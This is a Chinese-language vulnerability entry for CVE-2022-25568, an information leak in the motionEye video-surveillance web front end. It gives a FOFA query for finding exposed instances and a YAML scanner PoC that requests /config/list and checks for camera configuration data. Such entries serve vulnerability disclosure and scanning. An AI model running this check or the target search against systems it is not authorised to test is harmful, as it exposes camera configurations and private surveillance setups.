漏洞描述
motionEye是用Python写的motion的Web前端,它可以监视视频信号并检测运动。它可以与多种类型的摄像机配合使用,也可以与电影文件一起使用,从而使您可以分析录制的视频,其中存在一个信息泄漏漏洞,通过构造特定的URL即可获取服务器敏感信息
fofa: banner="motionEye"
CVE-2022-25568: MotionEye 视频监控组件 list 信息泄漏
PoC代码[已公开]
id: CVE-2022-25568
info:
name: MotionEye 视频监控组件 list 信息泄漏
author: zan8in
severity: medium
description: |-
motionEye是用Python写的motion的Web前端,它可以监视视频信号并检测运动。它可以与多种类型的摄像机配合使用,也可以与电影文件一起使用,从而使您可以分析录制的视频,其中存在一个信息泄漏漏洞,通过构造特定的URL即可获取服务器敏感信息
fofa: banner="motionEye"
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-25568
tags: cve,cve2022,motioneye,info
created: 2023/06/23
rules:
r0:
request:
method: GET
path: /config/list
expression: response.status == 200 && response.body.bcontains(b'{"cameras":') && response.headers["server"].icontains("motionEye")
expression: r0()